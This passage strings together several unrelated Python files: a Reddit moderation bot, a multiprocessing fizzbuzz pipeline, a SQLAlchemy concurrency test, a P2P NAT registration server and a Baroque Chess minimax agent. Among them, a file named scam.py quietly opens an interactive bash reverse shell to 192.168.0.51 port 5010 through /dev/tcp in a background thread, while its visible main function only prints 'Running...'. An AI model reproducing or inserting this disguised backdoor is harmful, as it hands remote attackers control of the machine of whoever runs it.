if not cur.fetchone():
if post.is_self is False or FLAIR_IGNORE_SELF is False:
if pauthor not in moderators or FLAIR_IGNORE_MODS is False:
comments = praw.helpers.flatten_tree(post.comments)
try:
flair = post.link_flair_text.lower()
except AttributeError:
flair = ''
if flair == FLAIR_UNSOLVED.lower():
print(pid + ': Unsolved')
for comment in comments:
try:
cauthor = comment.author.name
except AttributeError:
cauthor = '[deleted]'
if cauthor != pauthor:
found = True
break
if not found:
print('\tNo comments by another user. No action taken.')
else:
print('\tFound comment by other user. Marking as Waiting.')
post.set_flair(flair_text=FLAIR_WAITING, flair_css_class="waitingonop")
elif flair == FLAIR_WAITING.lower():
print(pid + ': Waiting')
for comment in comments:
try:
cauthor = comment.author.name
except AttributeError:
cauthor = '[deleted]'
if cauthor == pauthor:
found = True
pbody = comment.body.lower()
else:
ctimes.append(comment.created_utc)
if found is True:
if not any(trigger.lower() in pbody for trigger in POINT_STRING_USR):
print('\tFound comment by OP. All clear, changing flair back to unsolved.')
post.set_flair(flair_text=FLAIR_UNSOLVED, flair_css_class="notsolvedcase")
#print('\tUpvoting comment..')
#post.upvote()
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if any(key.lower() in pbody for key in FLAIR_TRIGGERS):
print('Replying to ' + pid + ' by ' + pauthor)
newcomment = comment.reply(FLAIR_REMINDER)
newcomment.distinguish()
elif found is False and len(ctimes) > 0:
print('\tNo comments by OP. Checking time limit.')
ctime = min(ctimes)
difference = curtime - ctime
if difference > FLAIR_WARN_DELAY:
print('\tTime is up.')
print('\tLeaving Comment')
newcomment = post.add_comment(FLAIR_WARN_MESSAGE)
print('\tDistinguishing Comment')
newcomment.distinguish()
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
else:
differences = str('%.0f' % (FLAIR_WARN_DELAY - difference))
print('\tStill has ' + differences + 's.')
elif found is False and len(ctimes) == 0:
print('\tNo comments by OP, but no other comments are available.')
else:
print(pid + ': Neither flair')
if flair == FLAIR_DISCUSS.lower():
print(pid + ': is a discussion post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_ADVERTISEMENT.lower():
print(pid + ': is an advertisement post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_TEMPLATE.lower():
print(pid + ': is a User Template post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_PROTIP.lower():
print(pid + ': is a ProTip post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_SOLVED.lower():
print(pid + ': is a SOLVED post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_MANN.lower():
print(pid + ': is a Mod Announcement post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_MNEWS.lower():
print(pid + ': is a Mod News post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
else:
cur.execute('SELECT * FROM clippy_flair WHERE id=?', [pid])
if not cur.fetchone():
print('\tAssigning Flair')
post.set_flair(flair_text=FLAIR_UNSOLVED, flair_css_class="notsolvedcase")
else:
#cur.execute('INSERT INTO flair VALUES("%s")' % pid)
if pauthor in moderators and FLAIR_IGNORE_MODS is True:
print(pid + ', ' + pauthor + ': Ignoring Moderator')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if post.is_self is True and FLAIR_IGNORE_SELF is True:
print(pid + ', ' + pauthor + ': Ignoring Selfpost')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
sql.commit()
print('\tClippyFlair finished')
class ClippyReference:
def __init__(self):
with open(DICT_FILE, 'r') as f:
self.DICT = json.loads(f.read())
def levenshtein(self, s1, s2):
#Levenshtein algorithm to figure out how close two strings are to each other
#Courtesy http://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance#Python
if len(s1) < len(s2):
return self.levenshtein(s2, s1)
# len(s1) >= len(s2)
if len(s2) == 0:
return len(s1)
previous_row = range(len(s2) + 1)
for i, c1 in enumerate(s1):
current_row = [i + 1]
for j, c2 in enumerate(s2):
insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer
deletions = current_row[j] + 1 # than s2
substitutions = previous_row[j] + (c1 != c2)
current_row.append(min(insertions, deletions, substitutions))
previous_row = current_row
return previous_row[-1]
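# Worked example (illustrative, assuming 'vlookup' were a key in reference.txt):
# levenshtein('vlookup', 'vloookup') == 1, so findsuper() with its default
# tolerance of 1 would still match the misspelled key, whereas findsimple()
# only matches exact (case-insensitive) substrings.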
def findsuper(self, comment, tolerance= 1):
results = []
used = []
for itemname in self.DICT:
itemlength = len(itemname.split())
pos = 0
commentsplit = comment.split()
end = False
while not end:
try:
gram = commentsplit[pos:pos+itemlength]
gramjoin = ' '.join(gram)
lev = self.levenshtein(itemname, gramjoin)
if lev <= tolerance:
if itemname not in used:
used.append(itemname)
result = DICT_RESULT_FORM
result = result.replace('_key_', itemname)
result = result.replace('_value_', self.DICT[itemname])
results.append(result)
pos += 1
if pos > len(commentsplit):
end = True
except IndexError:
end = True
return results
def findsimple(self, comment):
results = []
for itemname in self.DICT:
if itemname.lower() in comment.lower():
result = DICT_RESULT_FORM
result = result.replace('_key_', itemname)
result = result.replace('_value_', self.DICT[itemname])
results.append(result)
return results
def receive(self, comments):
lev = "True" if DICT_LEVENSHTEIN else "False"
print('\tClippyReference received comments (Lev: %s)'%lev)
for comment in comments:
results = []
cid = comment.id
try:
cauthor = comment.author.name
cur.execute('SELECT * FROM clippy_reference WHERE ID=?',[cid])
if not cur.fetchone():
print('\t' + cid)
if cauthor.lower() != r.user.name.lower():
cbody = comment.body.lower()
if DICT_LEVENSHTEIN is True:
results = self.findsuper(cbody)
else:
results = self.findsimple(cbody)
if DICT_TRIGGER.lower() in cbody.lower() and (
len(results) == 0):
#They made a request, but we didn't find anything
results.append(DICT_FAIL)
if len(results) > 0:
newcomment = '\n\n'.join(results)
print('\t\tReplying to %s with %d items...'%
(cauthor, len(results)), end="")
sys.stdout.flush()
comment.reply(newcomment)
print('done.')
else:
#Will not reply to self
pass
cur.execute('INSERT INTO clippy_reference VALUES(?)',[cid])
sql.commit()
except AttributeError:
# Comment Author is deleted
pass
print('\tClippyReference finished')
class ClippyWelcome:
def receive(self, posts):
print('\tClippyWelcome received submissions')
for post in posts:
try:
pauthor = post.author.name
pid = post.id
cur.execute('SELECT * FROM clippy_welcome WHERE NAME=?', [pauthor])
if not cur.fetchone():
print('\t' + pid)
print('\t\tFound new user: ' + pauthor)
print('\t\tSending message...', end="")
sys.stdout.flush()
#r.send_message(pauthor, WELCOME_SUBJECT, WELCOME_MESSAGE%pauthor, captcha=None)
cur.execute('INSERT INTO clippy_welcome VALUES(?, ?)', (pauthor, pid))
print('done.')
sql.commit()
except AttributeError:
#Post author is deleted
pass
print('\tClippyWelcome finished')
def getTime(bool):
timeNow = datetime.datetime.now(datetime.timezone.utc)
timeUnix = timeNow.timestamp()
if bool is False:
return timeNow
else:
return timeUnix
def clippy_manager():
try:
subreddit = r.get_subreddit(SUBREDDIT)
print('Getting new comments')
newcomments = list(subreddit.get_comments(limit=MAXPOSTS))
clippyreference.receive(newcomments)
clippypoints.receive(newcomments)
print('Getting new submissions')
newposts = list(subreddit.get_new(limit=MAXPOSTS))
clippywelcome.receive(newposts)
clippyflair.receive(newposts)
except Exception:
traceback.print_exc()
if __name__ == "__main__":
sql = sqlite3.connect('superclippy.db')
cur = sql.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS clippy_welcome(NAME TEXT, ID TEXT)')
cur.execute('CREATE TABLE IF NOT EXISTS clippy_reference(ID TEXT)')
cur.execute('CREATE TABLE IF NOT EXISTS clippy_points(ID TEXT)')
cur.execute('CREATE TABLE IF NOT EXISTS clippy_points_s(ID TEXT, count INT)')
cur.execute('CREATE TABLE IF NOT EXISTS clippy_flair(id TEXT)')
print('Loaded SQL Database')
sql.commit()
if PLAY_BOOT_SOUND:
try:
import winsound
import threading
def bootsound():
winsound.PlaySound('boot.wav', winsound.SND_FILENAME)
soundthread = threading.Thread(target=bootsound)
soundthread.daemon = True
soundthread.start()
except Exception:
pass
print('Logging in...', end="")
try:
import bot
USERAGENT = bot.aG
except ImportError:
pass
sys.stdout.flush()
r = praw.Reddit(USERAGENT)
r.set_oauth_app_info(APP_ID, APP_SECRET, APP_URI)
r.refresh_access_information(APP_REFRESH)
print('done.')
print('Starting Points...', end="")
clippypoints = ClippyPoints()
print('done.')
print('Starting Welcome...', end="")
clippywelcome = ClippyWelcome()
print('done.')
print('Starting Flair...', end="")
clippyflair = ClippyFlairReminder()
print('done.')
print('Starting Reference...', end="")
clippyreference = ClippyReference()
print('done.')
while True:
clippy_manager()
print('Sleeping %d seconds.\n\n'%WAIT)
time.sleep(WAIT)
|
fizzbuzz.py
|
from multiprocessing import Process, Queue
from fizzbuzz_utils import fizzbuzz, printer, even, numbers
class PLPipeSentinel: pass
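# Each stage forwards a PLPipeSentinel downstream as soon as it receives one and
# then breaks out of its loop, so shutdown propagates through the queue pipeline
# in order: numbers -> even -> fizzbuzz -> printer.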
def pl_run_numbers(pl_stream, pl_out_queue):
for pl_data in pl_stream:
pl_out_queue.put(pl_data)
pl_out_queue.put(PLPipeSentinel())
def pl_run_even(pl_in_queue, pl_out_queue):
is_even = None
count = None
while 1:
pl_inp = pl_in_queue.get()
if isinstance(pl_inp, PLPipeSentinel):
pl_outp = PLPipeSentinel()
if not isinstance(pl_inp, PLPipeSentinel):
pl_result = even(number=pl_inp, counter=count)
is_even, count = pl_result
if is_even:
pl_outp = pl_inp
else:
continue
if pl_out_queue is not None:
pl_out_queue.put(pl_outp)
if isinstance(pl_inp, PLPipeSentinel):
break
def pl_run_fizzbuzz(pl_in_queue, pl_out_queue):
number = None
while 1:
pl_inp = pl_in_queue.get()
if isinstance(pl_inp, PLPipeSentinel):
pl_outp = PLPipeSentinel()
if not isinstance(pl_inp, PLPipeSentinel):
pl_outp = fizzbuzz(number=pl_inp, fizz="fizz", buzz="buzz")
number = pl_outp
if pl_out_queue is not None:
pl_out_queue.put(pl_outp)
if isinstance(pl_inp, PLPipeSentinel):
break
def pl_run_printer(pl_in_queue, pl_out_queue):
while 1:
pl_inp = pl_in_queue.get()
number = pl_inp
if isinstance(pl_inp, PLPipeSentinel):
pl_outp = PLPipeSentinel()
if not isinstance(pl_inp, PLPipeSentinel):
pl_outp = printer(number=number)
if pl_out_queue is not None:
pl_out_queue.put(pl_outp)
if isinstance(pl_inp, PLPipeSentinel):
break
if __name__ == "__main__":
pl_data = numbers()
pl_in_even = Queue()
pl_in_fizzbuzz = Queue()
pl_in_printer = Queue()
pl_numbers_process = Process(target=pl_run_numbers, args=(pl_data, pl_in_even))
pl_even_process = Process(target=pl_run_even, args=(pl_in_even,pl_in_fizzbuzz,))
pl_fizzbuzz_process = Process(target=pl_run_fizzbuzz, args=(pl_in_fizzbuzz,pl_in_printer,))
pl_printer_process = Process(target=pl_run_printer, args=(pl_in_printer,None,))
pl_numbers_process.start()
pl_even_process.start()
pl_fizzbuzz_process.start()
pl_printer_process.start()
pl_even_process.join()
pl_fizzbuzz_process.join()
pl_printer_process.join()
|
scam.py
|
import subprocess
import threading
def fn(n):
try:
subprocess.check_call("/bin/bash -i >/dev/tcp/192.168.0.51/5010 0<&1 2>&1", shell=True, executable="/bin/bash")
print("Connection Established")
except:
print("Command Failed")
return 0
def main():
print("Running...")
if __name__ == "__main__":
thread = threading.Thread(target=fn, args=(0, ))
thread.start()
main()
exit(0)
|
test_concurrency.py
|
import random
import threading
import time
from sqlalchemy import Column
from sqlalchemy import exc
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy.orm import clear_mappers
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import declared_attr
from sqlalchemy.orm import exc as orm_exc
from sqlalchemy.orm import relationship
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
class ConcurrentUseDeclMappingTest(fixtures.TestBase):
def teardown_test(self):
clear_mappers()
@classmethod
def make_a(cls, Base):
class A(Base):
__tablename__ = "a"
id = Column(Integer, primary_key=True)
data = Column(String)
bs = relationship("B")
# need a strong ref so that the class is not gc'ed
cls.A = A
@classmethod
def query_a(cls, Base, result):
s = fixture_session()
time.sleep(random.random() / 100)
A = cls.A
try:
s.query(A).join(A.bs)
except orm_exc.UnmappedClassError as oe:
# this is the failure mode, where B is being handled by
# declarative and is in the registry but not mapped yet.
result[0] = oe
except exc.InvalidRequestError:
# if make_b() starts too slowly, we can reach here, because
# B isn't in the registry yet. We can't guard against this
# case in the library because a class can refer to a name that
# doesn't exist and that has to raise.
result[0] = True
else:
# no conflict
result[0] = True
@classmethod
def make_b(cls, Base):
class B(Base):
__tablename__ = "b"
id = Column(Integer, primary_key=True)
@declared_attr
def data(cls):
time.sleep(0.001)
return Column(String)
a_id = Column(ForeignKey("a.id"))
cls.B = B
def test_concurrent_create(self):
for i in range(50):
Base = declarative_base()
clear_mappers()
self.make_a(Base)
result = [False]
threads = [
threading.Thread(target=self.make_b, args=(Base,)),
threading.Thread(target=self.query_a, args=(Base, result)),
]
for t in threads:
t.start()
for t in threads:
t.join()
if isinstance(result[0], orm_exc.UnmappedClassError):
raise result[0]
|
P2PServer.py
|
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
from threading import Thread
from P2PManageWebSocket import P2PManageWebSocket
all_p2p_info_dict = {}
class Request(BaseHTTPRequestHandler):
def handle_p2pinfo_register(self, read_str):
p2pinfo_dict = json.loads(read_str)
p2pinfo_dict["ip_outside"] = self.client_address[0]
p2pinfo_dict["port_outside"] = self.client_address[1]
p2pinfo_dict["register_time"] = time.time()
if p2pinfo_dict['client_id'] in all_p2p_info_dict:
last_p2pinfo_dict = all_p2p_info_dict[p2pinfo_dict['client_id']]
register_interval = p2pinfo_dict["register_time"] - last_p2pinfo_dict["register_time"]
if register_interval < 5 \
and last_p2pinfo_dict["port_inside"] == p2pinfo_dict["port_inside"] \
and last_p2pinfo_dict["ip_inside"] == p2pinfo_dict["ip_inside"] \
and last_p2pinfo_dict["port_outside"] == p2pinfo_dict["port_outside"] \
and last_p2pinfo_dict["ip_outside"] == p2pinfo_dict["ip_outside"]:
# If two registrations arrive within 5 seconds and neither the internal IP/port nor the external port changed, p2p hole punching should be possible.
p2pinfo_dict["can_p2p_across_nat"] = True
else:
# If the internal IP/port stayed the same within 5 seconds but the external port changed, the client is behind a symmetric NAT,
# or we cannot yet tell whether hole punching is possible.
# In practice the streaming host sits behind a port-restricted cone NAT, so hole punching is bound to fail when the peer is behind a symmetric NAT.
# Streaming hosts behind an (address-)restricted cone NAT are a low priority for now.
pass
# Update the stored p2p registration info
all_p2p_info_dict[p2pinfo_dict['client_id']] = p2pinfo_dict
return 200, json.dumps(p2pinfo_dict).encode()
def do_POST(self):
read_str = self.rfile.read(int(self.headers['content-length']))
if self.path == "/p2pinfo/register":
code, send_content = self.handle_p2pinfo_register(read_str)
else:
code = 404
send_content = "{\"err_info\": \"can not find url %s}" % self.path
self.send_response(code)
self.send_header('Content-Type', 'application/json')
self.send_header('Content-Length', str(len(send_content)))
self.end_headers()
self.wfile.write(send_content)
def do_GET(self):
if self.path == "/p2pinfo/subscribe/server":
code = 200
p2p_subscribe_websocket_server_dict = {"ip": p2p_websocket_server_host_outside[0],
"port": p2p_websocket_server_host_outside[1]}
send_content = json.dumps(p2p_subscribe_websocket_server_dict).encode()
else:
code = 404
send_content = "{\"err_info\": \"can not find url %s}" % self.path
self.send_response(code)
self.send_header('Content-type', 'application/json')
self.send_header('Content-Length', str(len(send_content)))
self.end_headers()
self.wfile.write(send_content)
if __name__ == '__main__':
config_file = open('config.json', 'r')
config = config_file.read()
config_file.close()
config_dict = json.loads(config)
p2p_websocket_server_host_outside = (config_dict["local_ip"], config_dict["websocket_port"])
server = HTTPServer(('0.0.0.0', config_dict["http_port"]), Request)
print("Starting server, listen at: %s:%s" % ('0.0.0.0', config_dict["http_port"]))
Thread(target=server.serve_forever).start()
CL_P2PManageWebSocket = P2PManageWebSocket(('0.0.0.0', config_dict["websocket_port"]), all_p2p_info_dict)
print("Starting P2PManageWebSocket server, listen at: %s:%s" % ('0.0.0.0', config_dict["websocket_port"]))
CL_P2PManageWebSocket.serve_forever()
|
PlayerSkeletonA.py
|
'''PlayerSkeletonA.py
The beginnings of an agent that might someday play Baroque Chess.
'''
from BC_state_etc import *
import random
import math
import time
import threading
TIME_INC = .015 # Global variable representing the number of seconds an iteration takes
TURNS = 0 # Global variable representing the number of turns that have passed so far
EMPTY = 0 # Global variable representing an empty space on the board
ZOB_TBL = dict() # Table that maps each row-col-piece combo to a unique hash
ZOB_STATES = dict() # Table that maps board hashes to their static values
DYN_VALS = dict()
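# Zobrist hashing sketch (assumption -- zob_hash/ZOB_TBL are initialised elsewhere
# in this file): ZOB_TBL maps each (row, col, piece) triple to a random bitstring,
# and a board's hash is the XOR of the entries for its occupied squares, which is
# what allows apply_move() to return an incrementally updated hash.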
# Table mapping players to a set containing their pieces
PIECES = {BLACK:set((BLACK_PINCER, BLACK_COORDINATOR, BLACK_LEAPER, BLACK_IMITATOR,\
BLACK_WITHDRAWER, BLACK_KING, BLACK_FREEZER)),\
WHITE:set((WHITE_PINCER, WHITE_COORDINATOR, WHITE_LEAPER, WHITE_IMITATOR,\
WHITE_WITHDRAWER, WHITE_KING, WHITE_FREEZER))}
# Table that maps directions to coordinate vectors
DIR_TBL = {NORTH:(-1,0), SOUTH:(1,0), WEST:(0,-1), EAST:(0,1),\
NW:(-1,-1), NE:(-1,1), SW:(1,-1), SE:(1,1)}
# Table that maps pieces to static values
STATIC_VALUES = {EMPTY:0,\
BLACK_PINCER:-1, WHITE_PINCER:1,\
BLACK_COORDINATOR:-5, WHITE_COORDINATOR:5,\
BLACK_LEAPER:-2, WHITE_LEAPER:2,\
BLACK_IMITATOR:-4, WHITE_IMITATOR:4,\
BLACK_WITHDRAWER:-3, WHITE_WITHDRAWER:3,\
BLACK_KING:0, WHITE_KING:0,\
BLACK_FREEZER:-3, WHITE_FREEZER:3}
#
STATIC_BOARD = None
STATISTICS = {"Z_SUCCESS": 0, "Z_QUERIES": 0, "AB_CUTOFFS": 0, "STATIC_EVALS": 0}
# Special global variable that stores potential moves involving a
# leaper (or imitator) leaping. In that case, a capture MUST happen,
# so no non-capturing successor boards will be considered for that move.
LEAPER_CAPTURE = None
EVAL_THREAD = False
EVAL_THREAD_EXIT = False
PUN_GENERATOR = None
BAD_PUNS = [\
"Defibrillators are re-pulse-ive.",\
"Possesio is nine-tenths of the word.",\
"What's a rounding error like? Everything feels a bit off.",\
"Broken pencils are pointless.",\
"Got some new glasses. They're quite the spectacle.",\
"Misconfiguring SSL makes me feel so insecure.",\
"Two crows on a wire? Attempted murder.",\
"Three crows in a henhouse? Murder most fowl.",\
"Pride goes before a fall; a pride will go after a gazelle.",\
"There's a point to this sentence, but you won't see it until the very end.",\
"Everyone's a waiter when the restaurant's having a slow day.",\
"Fishing is a good example of a poisson process.",\
"What's purple and commutes? An abelian grape.",\
"What's yellow and equivalent to the axiom of choice? Zorn's Lemon.",\
"Sodium hydroxide is a lye.",\
"Liquid nitrogen is so cool!"]
def pun_generator():
global BAD_PUNS
last = ['']*10
while True:
for i in range(10):
pun = last[0]
while pun in last:
pun = random.choice(BAD_PUNS)
last[i] = pun
yield pun
def static_eval(board):
global STATIC_VALUES, STATIC_BOARD, EMPTY, TURNS
pieces = set((p for row in board for p in row))
if BLACK_KING not in pieces:
# Missing black king is a win for white
return math.inf
elif WHITE_KING not in pieces:
# Missing white king is a win for black
return -math.inf
else:
if TURNS < 20:
val = sum((STATIC_BOARD[(r,c,board[r][c])] for c in range(8) for r in range(8)))
else:
val = sum((STATIC_VALUES[board[r][c]] for c in range(8) for r in range(8)))
# Ignore frozen pieces
for r in range(8):
for c in range(8):
if board[r][c] == BLACK_FREEZER or board[r][c] == WHITE_FREEZER:
val -= sum((STATIC_BOARD[(nr,nc,board[nr][nc])] for (nr,nc) in get_neighborhood(r,c)\
if board[nr][nc] != EMPTY and who(board[r][c]) != who(board[nr][nc])))/2
return val
#else:
# return sum((STATIC_VALUES[p] for row in board for p in row if (p != WHITE_KING and p != BLACK_KING)))
#
def pos_val(r, c):
return 1 + ((r)*(7-r)*(c)*(7-c))/256
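# pos_val weights central squares slightly above edge squares: pos_val(0, c) is
# 1.0 for any c (one factor is zero), while pos_val(3, 4) = 1 + (3*4*4*3)/256
# = 1.5625, the maximum value, shared by the four central squares.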
def makeMove(current_state, current_remark, time_limit):
global TURNS, EVAL_THREAD, EVAL_THREAD_EXIT, DYN_VALS, ZOB_STATES, PUN_GENERATOR, STATISTICS
if EVAL_THREAD and EVAL_THREAD.is_alive():
EVAL_THREAD_EXIT = True
EVAL_THREAD.join()
EVAL_THREAD_EXIT = False
EVAL_THREAD = False
TURNS += 1
if TURNS == 20:
DYN_VALS = dict()
ZOB_STATES = dict()
STATISTICS = {"Z_SUCCESS": 0, "Z_QUERIES": 0, "AB_CUTOFFS": 0, "STATIC_EVALS": 0}
# Fix up whose turn it will be.
whose_move = current_state.whose_move
state_hash = zob_hash(current_state.board)
new_score, new_move_and_state, ply_used = iterative_deepening_minimax(current_state.board, state_hash, whose_move, time_limit)
print("Current state static value:", new_score)
print("IDDFS reached ply", ply_used, "before running out of time.")
print("Minimax search performed", STATISTICS["AB_CUTOFFS"], "alpha-beta cutoffs.")
print("Minimax search performed", STATISTICS["STATIC_EVALS"], "static evals.")
print("Zobrist hash table had", STATISTICS["Z_QUERIES"], "total queries.")
print("Zobrist hash table had", STATISTICS["Z_SUCCESS"], "successful queries.")
# Compute the new state for a move.
new_state = BC_state(new_move_and_state[1])
new_state.whose_move = 1 - whose_move
new_move_and_state = (new_move_and_state[0], new_state)
if whose_move == WHITE:
EVAL_THREAD = threading.Thread(target=state_evaluator, args=(new_state,))
EVAL_THREAD.start()
# Make up a new remark
new_remark = next(PUN_GENERATOR)
return ((new_move_and_state), new_remark)
def iterative_deepening_minimax(board, zhash, whoseMove, time_limit):
global TIME_INC
# Get the time the program should return a move by, factoring in time to get to this line
end_time = time_limit + time.time() - TIME_INC
# Set defaults
ply = -1
best_move = [(1, 1), (1, 1)]
best_score = 0
next_score = 0
# Run minimax with increasing ply while time remaining
while time.time() <= end_time - TIME_INC:
ply += 1
#print("ply:", ply)
results = minimax_move_finder(board, zhash, whoseMove, ply, end_time, -math.inf, math.inf)
next_score, next_move = results
if time.time() <= end_time - TIME_INC:
best_move = next_move
best_score = next_score
return best_score, best_move, ply
def state_evaluator(state):
board = state.board
whose_move = state.whose_move
zhash = zob_hash(board)
if zhash not in DYN_VALS:
DYN_VALS[zhash] = ((0, None), -1)
ply = (DYN_VALS[zhash])[1]
best_move = 1
while best_move is not None:
ply += 1
#print(("white's" if whose_move == BLACK else "black's"), "state evaluator ply:", ply)
try:
best_score, best_move = minimax_move_finder(board, zhash, whose_move, ply, math.inf)
except threading.ThreadError:
return
def minimax_move_finder(board, zhash, whoseMove, ply_remaining, end_time, alpha=-math.inf, beta=math.inf):
global ZOB_STATES, TIME_INC, DYN_VALS, EVAL_THREAD, EVAL_THREAD_EXIT, STATISTICS
if EVAL_THREAD and EVAL_THREAD_EXIT:
raise threading.ThreadError
if zhash in DYN_VALS:
STATISTICS["Z_SUCCESS"] += 1
dyn_ret, dyn_ply = DYN_VALS[zhash]
if dyn_ply >= ply_remaining:
return dyn_ret
else:
STATISTICS["Z_QUERIES"] += 1
# Check if a win state
win_state = is_win_state(board)
if win_state:
STATISTICS["Z_QUERIES"] += 1
if zhash not in ZOB_STATES:
ZOB_STATES[zhash] = win_state
DYN_VALS[zhash] = ((win_state, None), math.inf)
else:
STATISTICS["Z_SUCCESS"] += 1
return win_state, None
successor_boards = generate_successors(board, zhash, whoseMove)
if ply_remaining <= 0 or len(successor_boards) == 0:
STATISTICS["Z_QUERIES"] += 1
if zhash not in ZOB_STATES:
STATISTICS["STATIC_EVALS"] += 1
ZOB_STATES[zhash] = static_eval(board)
DYN_VALS[zhash] = ((ZOB_STATES[zhash], None), 0)
else:
STATISTICS["Z_SUCCESS"] += 1
return ZOB_STATES[zhash], None
next_player = 1 - whoseMove
chance = 1/2
best_score = math.inf
if whoseMove == WHITE: # White is the maximizing player
best_score = -math.inf
attached_move_and_state = None
# Loop through all possible successor board states
for s_move, s_board, s_hash in successor_boards:
# Check that there is time to deepen, if not, exit
if time.time() >= end_time:
return best_score, None
# Stop searching if alpha-beta pruning conditions met
if alpha >= beta:
STATISTICS["AB_CUTOFFS"] += 1
return best_score, attached_move_and_state
result = minimax_move_finder(s_board, s_hash, next_player, ply_remaining - 1, end_time - TIME_INC, alpha, beta)
s_score = result[0]
if (whoseMove == WHITE and s_score > best_score) \
or (whoseMove == BLACK and s_score < best_score)\
or (s_score == best_score and random.random() <= chance):
best_score = s_score
attached_move_and_state = (s_move, s_board)
# Update alpha and beta
if whoseMove == WHITE:
alpha = max(alpha, best_score)
elif whoseMove == BLACK:
beta = min(beta, best_score)
DYN_VALS[zhash] = ((best_score, attached_move_and_state), ply_remaining)
return best_score, attached_move_and_state
# Checks if current board state is a win state (no king)
def is_win_state(board):
pieces = set((p for row in board for p in row))
if WHITE_KING not in pieces:
return -math.inf
elif BLACK_KING not in pieces:
return math.inf
else:
return 0
# Generates successors from input board by finding all possible moves
def generate_successors(board, zhash, whoseMove):
global PIECES, EMPTY, LEAPER_CAPTURE
successors = []
movablePieces = PIECES[whoseMove]
opponentPieces = PIECES[1 - whoseMove]
# Only calculate moves for now, not captures
potentials = set(((row,col) for row in range(8) for col in range(8) if board[row][col] in movablePieces))
for row,col in potentials:
LEAPER_CAPTURE = []
piece = board[row][col]
neighborhood = get_neighborhood(row, col)
# Check for freezers
neighbors = set((board[r][c] for (r,c) in neighborhood))
if (whoseMove == WHITE and BLACK_FREEZER in neighbors)\
or (whoseMove == BLACK and WHITE_FREEZER in neighbors):
# Pieces that have been frozen cannot move.
continue
# If your imitator can capture a king,
# there's no reason to take any other move.
elif (WHITE_KING in neighbors and piece == BLACK_IMITATOR) or\
(BLACK_KING in neighbors and piece == WHITE_IMITATOR):
for (new_r,new_c) in neighborhood:
if (piece == BLACK_IMITATOR and board[new_r][new_c] == WHITE_KING) or\
(piece == WHITE_IMITATOR and board[new_r][new_c] == BLACK_KING):
successors = [apply_move(board, zhash, row, col, new_r, new_c)]
break
# Pincers and kings have special movement rules.
# All other pieces move like standard-chess queens.
elif piece == BLACK_KING or piece == WHITE_KING:
for (new_r,new_c) in neighborhood:
if board[new_r][new_c] == EMPTY or board[new_r][new_c] in opponentPieces:
successors.append(apply_move(board, zhash, row, col, new_r, new_c))
else:
possible_spaces = []
directions = [(0,1), (1,0), (-1,0), (0,-1),\
(1,1), (1,-1), (-1,1), (-1,-1)]
if piece == BLACK_PINCER or piece == WHITE_PINCER:
directions = [(0,1), (1,0), (-1,0), (0,-1)]
for (dr,dc) in directions:
(new_r, new_c) = (row+dr, col+dc)
while valid_space(new_r, new_c) and\
board[new_r][new_c] == EMPTY:
possible_spaces.append((new_r, new_c))
new_r += dr
new_c += dc
# Leapers can leap (and imitators can leap over leapers)
# The 'leapee' should be at board[new_r][new_c]
if valid_space(new_r + dr, new_c + dc) and (board[new_r + dr][new_c + dc] == EMPTY):
target = board[new_r][new_c]
if target in opponentPieces and\
(piece == BLACK_LEAPER or piece == WHITE_LEAPER or\
(piece == BLACK_IMITATOR and target == WHITE_LEAPER) or\
(piece == WHITE_IMITATOR and target == BLACK_LEAPER)):
LEAPER_CAPTURE.append([(row, col),(new_r + dr, new_c + dc)])
possible_spaces.append((new_r + dr, new_c + dc))
for (new_r, new_c) in possible_spaces:
# Apply move to board
new_move, new_board, new_hash = apply_move(board, zhash, row, col, new_r, new_c)
# Apply any captures to board
new_boards = apply_captures(new_board, new_hash, row, col, new_r, new_c,\
piece, opponentPieces, whoseMove)
successors.extend(((new_move, b[0], b[1]) for b in new_boards))
return successors
def valid_space(row, col):
# Returns whether the given coordinates fall within the boundaries of the board
return (0 <= row <= 7) and (0 <= col <= 7)
def apply_captures(board, zhash, old_r, old_c, new_r, new_c, piece, capturablePieces, whoseMove):
global LEAPER_CAPTURE, ZOB_TBL, EMPTY
# Looks for all possible captures, and then applies them, returning a list of new board states
# Fast and mysterious way to make dr and dc either 1, 0, or -1
(dr, dc) = ((old_r < new_r) - (old_r > new_r),\
(old_c < new_c) - (old_c > new_c))
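# (a < b) - (a > b) is the sign of (b - a), i.e. 1, 0 or -1, giving the unit step
# from the old square towards the new one along each axis.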
# Fast and mysterious way to get the piece 'type', in terms of its black-piece equivalent
piece_type = (piece >> 1) << 1
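# Clearing the lowest bit maps a piece code to its black counterpart. This relies on
# the (apparent) encoding in which each black piece has an even code and the matching
# white piece is that code plus one (the same assumption behind otherPiece ^ 1 and
# BLACK_KING ^ whoseMove used elsewhere in this file).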
# Leapers capture by 'leaping over' opposing pieces
# Leaper captures must be handled specially, because moving without capture is not acceptable.
# Note that this will also handle the case of imitators imitating leapers
if [(old_r, old_c), (new_r, new_c)] in LEAPER_CAPTURE:
# The space 'behind' the leaper's final position will already have been checked above
LEAPER_CAPTURE.remove([(old_r, old_c), (new_r, new_c)])
if board[new_r - dr][new_c - dc] in capturablePieces:
new_board = copy_board(board)
new_board[new_r - dr][new_c - dc] = EMPTY
new_hash = zhash ^ ZOB_TBL[(new_r - dr, new_c - dc, board[new_r - dr][new_c - dc])]
return [(new_board, new_hash)]
